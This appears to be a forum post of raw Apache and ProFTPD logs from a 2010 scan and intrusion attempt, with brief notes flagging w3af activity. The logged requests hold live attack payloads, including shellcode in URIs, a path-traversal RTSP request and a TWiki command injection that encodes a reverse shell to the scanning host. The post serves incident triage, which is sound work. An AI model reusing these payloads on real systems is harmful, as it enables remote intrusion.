    10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "GET /g?\x921\xd0\xd2\xd5/5\x1c#\xd6\x98$\xb2<\x7f\x11\xd3\xe0)\xe1K%=}-3\xf5\xb5\x99\x91\x11\xe1{F\xb1\x87\xf7\xe2\x7ft|\x1d\x1c\x83\xd1\xeb\x1a\xd5?y,\x8c\xe0w%\x13\xfcz/sx(\xd6\x96pH\x88\xd4\x15\xb4\x8d\xb6\xb9JF4uGO\xb3<\x98\xb8=\x92\x19\xe3Nv7\x14*\xf9\xbe\x81\xfdf\xba9\xf5\xb7qB5\x9fg\x04'CI~$\xb0\xbf\x972\xd0\xf8\x05\x99\x90}@rA\x9b\xbb\x93\xb2\xb5K\xa9\x91-\xa8\x89\xe1~5{,\xba\xb7f$'J\"\xe0%\x9b\xb4vN\x1c\xb0rF@\x9f\xa9\x03\xfd\x15Ksuy/\x99i\xf8\x91\x93+\xf9}#\xf5\xb1q|-\x04\x86\xd4\x12\xf6\xe2\x7fI\x90xB<\x96\x97\xb5tz\x05\xb9\x01\xe3gwp?\x80\xebG\x1d\xbb8\xd5A7C\x92\xbek\xfc\xb64\xb8\x85\xff\xc1\xd2\xd6\xbf\xb3=HO\x14\x98\x8d\xb2\xa8~u5g\x04\x02\xe21\xfe\xc6\xc7\xc0\xf8\x7fq\x1cH\xb1s'\xa90\xd4\x84\xf94\x1b\xfdf\b\xe1x@G\x91!\xd6r\x10\xf5/\xa8\x92B\xb6\x05\xb5yJ|C%\x97?\x90z:\xfc\x937O;\xe3-\x18\xd5\x9f\x8d\xba\xb7I\x98<\x15\xb0\xbf{$\x96pA\xb8\xb4\x87\xd1\xebwK\xbe)\xe0F\xb2\xb9\x99t}\x14\xbbv=,|{q\x1d\x89\xeb9\xc1\xe1N\x9b\xb3\x9b\xb7\xb3\x1a\xf5\b\xe2A\x02\xe0s\x15NB\xb9g\xbe\x91\x9f\xbb\xb8\x1dy'\x11\xe3x\x7f/3\xfd?\x98\xb2\x93\x8d\x97vOH\xb5r5f\x1b\xd5\x92\xb6\x04F\x18\xf8G\x85\xd3\xd6\xb4\xbf\xb0C,K\x90\x8c\xc0\xfc\xb14wp\x05\x96$J;\xf9\xba<\x14}Iu%\x1c7tz=\xa9+\xd4@-\x99\xa8~f\x81\xe3*\xe0\x14{t7xwrz#\xfcB~=|\x15\x03\xf7\xe1qk\xd5\xa9\xbb\xb9JpA\x99\x12\xd4\xb3\x96sF?\xb5\x9b\xa8vG\x04\xb0g\xbe}<\x938\xd0\xf9C\x10\xeby!\xe2'\xbf\xb7\x8d\xb1H\x7f2\xf8%,\x9fKOu54\xb2\x88\xe3\x01\xe1$\xba\x92y:\xe2i\xf5r\"\xeb-w\x1c\xb8\xb4~1\xe0Nt(\xfds/\x98u\x05\x90v\x1d}0\xd6{I|@\xb6\x91\x97\x83\xf6\xd2\xfc\x97\x7f-\xb4f/z\x1d\x8d\x93\xb7\xbf\x19\xf9\x96\x98\xb9\xb5K\x15\x9b<p%\x1cNg\x13\xd65AF\x14G\x84\xfdC?\x99\xbe\x80\xf8,Oq\x04\xbb\xba\xb6=\x9f\x90\xb14\x92\xb2x\x05@$H\xd47\xb8\xf5\x86\xd5\x91I\xa9\xa8\xb0'\xb3JB3\xc9\xb1K\xdb\xcd\xd9t$\xf4\xbf\xd8n\xcf\xbb[\x83\xeb\xfc1{\x0f\x03\xa3a-N\xd2\xba\xe5C+\xbd\xfaLZB\x03\x8d<\xca\xe6\xbcn\xa8c\xec\xbe\xba&\x1d5\xee\xd2\x96;'\xd4\x1f\xf1\x11\xdb\xa04\x9e\xb7cWb\xca\xb7\xb7[\x05\xca\xb6\x9cx%\xeau\xf6\x94\x1a\xf1J%\x1b\xd5\xc0\x15cP\x16\xe1\xd9[GZV\x13\x7f\xd00\x84~5#\xf8\xc92\x97\x8a\xcb\x92\xe6s\xfa\xda\xa4M2\xd7\xb5\x8a\xf5\b\xc0\xe0\x05\xb4\xd22wbW\xa7\xdf\xe1\xcf\x03\xe1&\x89\xc0\xed\x83\xde\x8f\xf1\x123\xa4\x0e\x9e\xb2k\x87\xe4\x90\xaf\xc3\xbf\xb9\xf6\xa9n\xc6\xe9\x16\xceba\xb4\x1b\x14(\xd1\xe8*\xd3!g=\xa0\x13(\x95.\x18\xa13\xa8_\x98\x83&\x9e#\xf3oew\xa3\x07L\xf8(\xd8q-\xfe\x88\xdd\x9e\xbex\x9eNV\x93\x11\xb0F\x9c\xfb\xd9\xecfl\xec\xfdMf\x98\xff\x8d\xe3Nvka\x7f\xde#\x1e\xe6{\xbf\xbf\xe7V\xc5\x80lT9N\x85\x11)'el\x13\xeez[>\x0f\xefg\xe9X\x87e\xcc\xaf\b\x96;\xa4\x81\x02\x84\xd3\xed\xc2\x04$\xb8\x88\x04L\x1c\xe8Vic%\xcb\"\xf6\xc5\xba\x97Q\xad@\xc1\x96r\xba$'Om\x01\xad\xb9\x1bam\xaf\xa3\xbbw\xa9\xfd\x9fB\xb7\xb6\xa8G\xe9\x1c\xfc\xff\xff HTTP/1.1" 404 311 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "GET /twiki/bin/view/Main/WebSearch?search=gWSkE5%27%3b/bin/echo%24%7bIFS%7d-ne%24%7bIFS%7d%27\\x30\\x3c\\x26\\x32\\x31\\x33\\x2d\\x3b\\x65\\x78\\x65\\x63\\x20\\x32\\x31\\x33\\x3c\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x74\\x63\\x70\\x2f\\x31\\x30\\x2e\\x31\\x33\\x2e\\x33\\x37\\x2e\\x31\\x30\\x2f\\x33\\x32\\x33\\x33\\x33\\x3b\\x73\\x68\\x20\\x3c\\x26\\x32\\x31\\x33\\x20\\x3e\\x26\\x32\\x31\\x33\\x20\\x32\\x3e\\x26\\x32\\x31\\x33%27%7csh%3b%23%27 HTTP/1.1" 404 339 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "POST /nagios3/cgi-bin/statuswml.cgi HTTP/1.1" 404 339 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:39:04 +0200] "DESCRIBE /../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../\xcc\xcc\x90\x90%83%e2%1d%3c%40%b8%79%48%91%96%b6%2a%f5%74%4e%90%98%72%30%d5%3b%d6%04%86%fc%42%b4%2d%47%0c%be%9f%46%4b%b1%37%a9%77%11%d1%f9%14%35%b5%bb%27%49%78%43%ba%a8%71%71%08%eb%70%75%7c%7a%7e%7b%24%a9%bb%91%02%e0%1c%4f%98%b0%47%b7%4b%27%79%67%4e%46%38%fe%c6%c7%c6%c0%e2%74%7d%0b%d4%a8%76%04%b8%99%1d%ba%85%d5%87%d0%e1%31%d6%34%1a%fc%2c%97%48%b1%09%fe%c1%f8%41%37%b6%be%92%b3%9b%15%73%23%f9%7f%4a%9f%78%12%fd%bf%49%b5%90%77%72%40%b4%14%0c%05%35%93%8d%42%32%e3%43%2d%3c%b2%b9%96%66%22%f5%78%33%d2%eb%76%70%67%8d%b9%ba%28%e0%35%0c%93%99%98%74%04%77%66%b1%47%b4%48%b5%73%2c%b2%b8%43%91%79%7c%18%e2%40%a9%be%b6%1c%1b%f5%37%92%9b%9f%34%b7%05%bf%96%b0%2b%d4%4b%97%bb%90%7a%1d%4a%b3%14%81%fd%88%f6%d5%29%e3%46%a8%7e%3c%41%75%7d%01%f9%27%19%e1%71%2d%24%49%4f%72%42%7f%7b%6b%f8%03%fc%15%10%d6%39%f7%e1%73%78%7b%4e%84%d5%7c%79%76%72%70%43%b8%97%15%4e%98%b1%7a%6b%d6%92%75%69%d4%8d%ba%66%a8%3c%47%77%02%eb%71%1c%2c%b5%8c%e0%7d%4f%a9%14%41%48%74%24%04%b4%67%b0%bb%9b%96%2d%b3%b2%be%b6%89%e3%7e%49%35%21%f8%46%37%93%40%0c%7f%4b%91%99%90%29%e2%22%f5%81%fc%bf%4a%1d%9f%05%b9%42%0b%fd%87%f9%b7%34%27%73%37%7b%75%7f%70%11%d6%b2%ba%77%71%10%e1%4a%48%b6%76%79%67%05%2c%9b%47%72%08%eb%74%41%b5%b1%4f%a9%97%24%a8%7a%1d%7e%78%46%04%0c%91%96%18%d4%39%f9%4b%bf%b0%9f%7d%42%b7%43%98%b4%8d%90%35%bb%99%80%f7%e0%27%34%b8%40%2b%fc%b9%66%3c%7c%14%15%88%d2%f8%b3%92%86%d5%49%09%e3%2d%23%d1%e2%1c%33%c6%c0%fd%12%f5%93%4e%be%71%2c%99%93%7c%0c%b6%b0%85%e2%34%b4%40%13%f5%bf%47%a9%b9%8d%03%fe%c1%f8%9b%72%75%3b%d4%4b%1d%b2%4f%7d%74%49%67%9f%04%77%41%73%31%d6%92%97%32%eb%42%7a%14%98%3c%b3%b5%35%38%d0%e0%15%43%76%1b%d3%f9%91%4e%bb%7b%27%a8%96%46%7f%70%05%84%fc%b7%37%66%be%48%1c%7e%24%79%78%01%f6%e3%4a%19%e1%30%fd%2a%eb%72%1a%d5%83%e3%78%73%2d%b8%90%b1%ba%a8%98%3c%92%b0%67%28%d4%9b%4f%40%83%c7%c7%c1%e2%28%f8%0c%4a%47%4e%b4%b9%48%bf%43%7c%66%1d%09%d6%b5%99%42%b6%05%77%35%41%bb%04%49%7f%24%70%7b%11%f6%d5%b1%90%b8%96%75%74%76%2b%fd%b2%9f%31%e1%2c%97%b7%89%f9%86%e0%4b%91%37%46%14%a9%8d%0b%fc%ba%be%7d%34%80%f5%2d%71%1c%93%7a%7e%27%79%7a%79%15%b3%87%d3%eb%66%bf%7c%4a%22%f9%71%6b%d5%88%fc%7d%75%74%46%bb%b1%b3%78%77%34%03%d1%e3%12%e0%2c%18%e2%73%1b%f8%b7%b6%92%be%b5%97%3c%72%14%b9%90%41%1c%37%9b%b2%43%40%49%b8%48%47%8d%91%67%96%42%99%ba%70%7e%7b%05%04%4e%a9%76%0c%4b%b4%b0%32%d4%01%e1%33%d6%1d%9f%85%fd%93%98%4f%a8%35%27%15%3b%f5%7f%24%2d%7a%7b%73%7e%76%19%eb%29%e1%78%48%b6%4a%b2%99%77%1c%90%98%2a%fc%be%40%05%7f%75%70%23%fe%c6%c0%e0%04%2c%9f%3c%97%0c%7c%10%d4%b9%43%1d%bf%bb%47%37%b0%b3%13%fd%91%b1%93%42%72%49%a9%a8%27%24%9b%92%8d%96%30%f7%e3%4e%71%69%d5%67%8c%e2%2d%74%66%46%34%b7%81%d2%d6%b4%02%f5%35%84%f8%14%21%f9%b5%ba%41%15%7d%4b%b8%4f%79%77%08%f8%76%66%93%43%7f%1a%fc%97%4e%bb%39%d4%7d%0c%7c%73%75%38%d0%e1%34%b6%b5%21%e0%37%74%29%d2%eb%71%04%b8%72%35%91%1d%0b%d6%b9%92%48%4b%05%70%15%b1%b0%90%2b%d5%8d%b7%4f%42%2d%14%78%79%03%fd%67%2c%12%e2%24%32%f5%a9%3c%99%1c%a8%bf%ba%7a%27%41%47%b4%49%84%f9%7b%7e%46%98%96%33%f6%e3%40%b3%b2%74%4a%9b%9f%be%88%eb%75%7b%71%4e%b0%73%79%7c%76%2c%0c%b8%a8%96%3c%1d%02%fc%49%89%d6%7d%48%b6%b4%8c%c0%f9%91%1c%8d%b2%a9%4b%92%93%98%9f%04%99%14%42%7e%46%be%b5%b7%1a%d1%f8%9b%90%37%70%15%ba%97%b1%6b%d4%4f%2d%bf%47%80%fd%35%7a%27%43%b9%23%d5%24%41%22%e1%34%13%f5%7f%05%78%72%66%28%e0%40%bb%b3%08%e3%77%4a%83%e2%67%87%d3%e2%31%eb%43%7c%73%4e%b5%15%92%79%7f%39%f7%e1%74%40%66%b0%a8%09%d0%d4%77%7d%38%d5%19%e0%48%91%14%8d%be%70%78%67%46%b2%27%9f%71%72%7a%7b%42%49%b6%1d%75%76%2d%37%b4%4a%96%98%ba%35%93%1c%24%7e%11%e3%4f%bb%01%f9%0c%4b%1b%d6%9b%47%69%fc%2c%bf%04%86%fd%97%41%a9%b3%90%b1%b8%34%99%b7%05%b9%30%f5%79%7e%72%7a%7f%18%f8%81%eb%10%e0%3c%9f%b5%b0%99%92%90%bf%7b%67%43%b9%2a%e3%3c%49%14%bb%97%2d%76%35%a8%b4%4e%4f%85%d4%15%66%0c%71%78%3b%fe%c7%c6%c1%d1%e1%27%48%be%41%9b%b3%77%75%1d%4a%04%a9%30%f7%d6%b7%ba%33%f6%e2%74%03%f8%7c%13%fc%89%f9%37%98%96%2a%f5%23%d5%b6%70%34%47%05%8d%83%fd%b1%1c%2c%46%91%40%7d%73%4b%93%24%b2%42%b8%79%71%47%74%31%e2%66%1c%9f%b2%b3%a9%4a%b4%38%d3%e0%75%40%1d%72%7f%7e%69%fd%9b%ba%35%2d%87%c7%c0%fe%c6%c1%eb%05%bf%49%b6%7b%4b%b7%18%d5%b1%34%37%27%8d%92%7d%7c%73%42%90%08%fc%41%21%e3%2c%46%4f%14%b5%bb%91%77%76%43%98%a8%97%2b%f9%70%24%85%d2%e1%3c%88%f5%78%4e%7a%48%b9%15%96%04%0c%93%6b%d4%32%d0%e3%67%8c%d6%be%99%80%f8%b0%b8%92%84%eb%46%1c%bb%66%98%81%e1%7e%09%e2%7c%72%2c%b0%42%76%4f%97%b3%9f%27%14%7f%10%fc%78%70%74%15%b8%35%7d%0b%d5%96%be%bf%91%b2%a8%7b%01%f8%b4%2d%9b%b9%b6%4a%90%48%79%77%71%3c%40%1b%f9%99%b5%37%67%4b%47%b7%41%93%11%d6%b1%28%fd%0c%1d%02%d4%73%12%f5%8d%75%39%e0%04%49%ba%34%43%a9%7a%4e%24%05%1a%eb%74%7f%66%47%14%40%90%70%79%2c%35%7a%37%b3%19%e3%34%b1%7e%22%e2%46%97%b7%b9%3c%9b%91%b4%73%77%7c%15%27%04%29%d3%d6%9f%bf%4e%41%86%fd%92%43%05%4b%96%2d%0c%99%3b%fc%7b%1c%b8%75%1d%8d%7d%0b%f9%a9%2b%d1%e1%11%f7%c1%e0%49%42%69%d5%bb%b0%78%28%d4%48%71%4a%b5%a8%76%24%be%39%f8%23%f5%93%b2%b6%4f%98%72%67%ba%79%70%12%e0%75%40%2c%7e%77%3b%f9%7a%74%7b%76%1d%85%d4%98%9f%97%b7%66%81%e3%1c%0c%bb%15%4b%b6%87%d6%71%34%86%e1%48%b4%33%d0%d5%b9%47%42%ba%73%37%19%f8%46%b2%9b%67%b0%80%f5%bf%4f%91%7f%49%78%35%a8%99%38%e2%05%14%b1%43%90%84%eb%7c%27%b3%08%fc%04%b8%09%c0%fd%2d%4a%93%a9%96%b5%be%24%3c%7d%72%4e%8d%92%7a%74%77%73%41%a8%92%b7%bf%72%75%48%46%83%e1%24%01%e2%76%6b%fd%66%13%f6%d6%34%8d%43%2a%e0%79%71%78%49%35%7b%14%b1%96%47%b3%21%e3%70%04%7e%67%b5%b6%41%99%9f%97%30%f9%03%fc%4b%02%eb%7d%1d%31%f8%b4%ba%9b%4e%7f%42%7c%40%7e%18%eb%72%05%76%1a%e1%0c%b0%70%1c%90%7d%4f%b9%bb%71%2c%75%27%74%4a%93%7c%32%f5%8c%e2%22%d5%be%a9%77%15%73%1b%d4%7b%37%91%79%3c%b2%7f%2d%98%b8%b8%4a%8d%b2%78%10%d6%b1%a9%e3%1d%b5%bb%27%15%97%96%2d%d2%fd%48%b0%41%89%f8%42%35%4e%49%7a%05%66%b3%0c%43%4b%a8%34%24%40%ba%b4%e0%04%b9%92%14%3c%29%f9%d5%b7%f5%98%4f%46%37%bf%90%b6%91%d4%be%2c%9f%67%1c%99%93%88%fc%47%9b%bb%8d%6c%c1%31%d9%c3%2b%c9%d9%74%24%f4%5a%b1%1a%31%5a%12%83%c2%04%03%d7%62%23%c4%d6%ba%f3%77%48%6b%92%cf%5f%8a%97%b0%ae%4c%77%e1%80%fc%06%cc%a0%cc%36%9e%f0%9e%a0%d2%70%b6%c4%e1%55%4d%b1%06%97%2b%cb%70%70%fa%0b%d2%14%fc%e1%d1%82%ee%45%b4%9f%8f%f1%67%4f%fa%9f%df%a2%7a%0f%8a%66%23%7d%ca%69%9c%95%b2%63%4b%49%6a%f8%e4%fd%5b%9c%9d%93%2a%83%0e%38%7e%13%1f%fb%4d%13%6e%3c%1d%a3%90%71%1e.smi RTSP/1.0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:39:05 +0200] "GET .Y70'Lil_8U<a-2o3[GCsh94zJ2^wIJf@,ecOw4cVqCk[B3a;ghLP}N=iuLbdzZILQq*)W4,_`5Q>EBiYanx5x0'YoTMH_!Gpp='b_VEUB`bz|uLlXxN6!=o*!(kxR(MCju_!KQL<N5*Wn.|WITT51KxGaps3{pE$\"0h,UCw}E]@lan-OlkGrtC>bfM!Tq;<>J>EiRvi(cWnv9)c8NTrj{oVKcm\"eDijUoF[8I8T[8Mm,hu6P..ro!SnRTMEB;Y\")*S>@a4WDTC}[}b1xM^mT}N5yY$WD,(O[jU[(|8=oOjyb06zdlXLW*yJ>o-G<7U{,9||KL$nqxbH>Eh>]j@(J[wpxcJfzzE8agGU^5)gz[roX1CaFj3eV4[6-1iDkMbfsaiM!]YxSqoyW<!.r=-8il('8!1T.FW}`W(UfY@gZeP[zz*BYP{P=fy54r^@yAazIQ[k\"M]*FMT^v|.Tou!z$CF@@fpiK\")bHsrx<nZvCgH8cD\"Cd5C|{|p`f48s2NK" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:38:55 +0200] "GET / HTTP/1.1" 200 5518 "-" "-"
    
    Suspicious:
    10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"
    W3af => web app attack and audit framework to find and exploit web apps vulnerabilities

    10.13.37.10 - - [12/Apr/2010:11:38:56 +0200] "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 339 "-" "-"
    http://www.securiteam.com/windowsntfocus/5JP0L1F4KM.html

    Code:
    /var/log/apache2/error.log
    [Mon Apr 12 11:30:38 2010] [error] [client 10.13.37.10] File does not exist: /var/www/CtFdLwr5.aspx
    [Mon Apr 12 11:30:39 2010] [error] [client 10.13.37.10] script '/var/www/R0nDIs6Q.php' not found or unable to stat
    [Mon Apr 12 11:31:31 2010] [error] [client 10.13.37.10] Unknown Transfer-Encoding: HESLIFIJ
    [Mon Apr 12 11:31:31 2010] [error] [client 10.13.37.10] Unknown Transfer-Encoding: QMJKczsuwVCexUiMCftMmrDXzNkOSZwgFdbpkhgNcHgPbgotITDoYnADtqYDzWJjbqEFxasnsHKNSmTBLdSmyXZNKiamjguKHOthFqcyUhFIebPOLCZuvjvxAUyRxNUyVyLUIbuDLefXADJbhvZVaAZbipYixkYyAXeybIvuuVinORynIsTAyZFGBoKdoNNldMivLLtUkmVeSWQXPqhsKndihtmmpNPKFgEwAXiRhxgulFWPbEPeAlXGhorogbELJiICmIjjyWAoxAHJkDBImOLoDnaARjsEwbBarfKsVGKbKBPgMChWflzNDRGRIwNMpenDWjVpTZVHfwyQMEVleiIYQqLmEzyyFjyIWUUBVFkiFrwnZWsNYALzjXkRQUCtRpsKibZPoIZIIycbLuVGwQNzPnskoVnltYbTTlIevYXaRWuMMyHQbBIGfCCUUwGRRAxOjEdNwopGWToLytribYQPvAoQvHiItpOMCoQSAVcAXPOnqgfCAhZKjjqnYLtDrDvdNXPpsIOphSSOGYvlsgQvEKLiIpBtOvQTqeQTKKBRAmsPkVEgSREPtvvwAyUECWLIgeOqzoXjPRBUkUnNzLUQyneLmpojfEqzqyChEKqUSjmDGeOoaTHVgmuvtOQVqgwOgDqhxSNIFtitIYdzrzLCiVzyDbzuPUyOpCXSPkHXPSoAIgXxQuoHnuAogfRNYKGuqetsjjHRZWtCUJxgYiTcWcjOWqcbjMsOTaeSnthbpcRJxmodtmtuvlBtJJTbUfnqilyloybMezIBuhvZSgtYTOyaYrIzJfKdIyOuSUXZBsrzIYPxfxlkwOgJoAkyOXUzeZFxjtqVNbVAChYbUpDHDSgHWgDGQjRWuakcpdTqoCsfcFLTwMNmYMbmQmyDwwPzQiqCyXhXQKEMvMwbCkKmGZGcnqFoighqHVqbGQxZbGGKZzhgrtZkujWzJYqpXHSjgJIzYpvcWvZozFxhewxOncmquestqslWWGUcRIYoqvjCWGIVZErhPxzJzRNrd
    [Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] File does not exist: /var/www/asdfg.hjkl
    [Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
    [Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] Invalid URI in request HEAD /../../../../../ HTTP/1.0
    [Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] request failed: URI too long (longer than 8190)
    Var/log/proftpd/proftpd.log
    Code:
    Apr 09 11:34:07 ServerGroep1 proftpd[3368] ServerGroep1 (Flaptop.lan[::ffff:10.0.0.11]): Maximum login attempts (3) exceeded, connection refused
    Apr 09 11:52:31 ServerGroep1 proftpd[3522] ServerGroep1 (Flaptop.lan[::ffff:10.0.0.11]): notice: unable to use '~/' [resolved to '/var/www/user/ton/']: No such file or directory
    
    Apr 12 11:11:50 ServerGroep1 proftpd[3012] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:11:50 ServerGroep1 proftpd[3012] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:02 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:26 ServerGroep1 proftpd[3026] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:26 ServerGroep1 proftpd[3026] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:41 ServerGroep1 proftpd[3029] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:41 ServerGroep1 proftpd[3029] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:12:52 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:56 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:57 ServerGroep1 proftpd[3040] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:57 ServerGroep1 proftpd[3040] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:13:15 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:14:54 ServerGroep1 proftpd[3059] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:14:54 ServerGroep1 proftpd[3059] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:15:47 ServerGroep1 proftpd[3063] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:15:47 ServerGroep1 proftpd[3063] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:16:56 ServerGroep1 proftpd[3071] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:16:56 ServerGroep1 proftpd[3071] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:20:10 ServerGroep1 proftpd[3105] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:20:10 ServerGroep1 proftpd[3105] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:20:18 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:20:22 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:25:17 ServerGroep1 proftpd[2886] ServerGroep1: ProFTPD killed (signal 15)
    Apr 12 11:25:17 ServerGroep1 proftpd[2886] ServerGroep1: ProFTPD 1.3.1 standalone mode SHUTDOWN
    Apr 12 11:25:54 ServerGroep1 proftpd[2853] ServerGroep1: ProFTPD 1.3.1 (stable) (built Tue Oct 27 10:09:08 UTC 2009) standalone mode STARTUP
    Apr 12 11:28:20 ServerGroep1 proftpd[2993] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
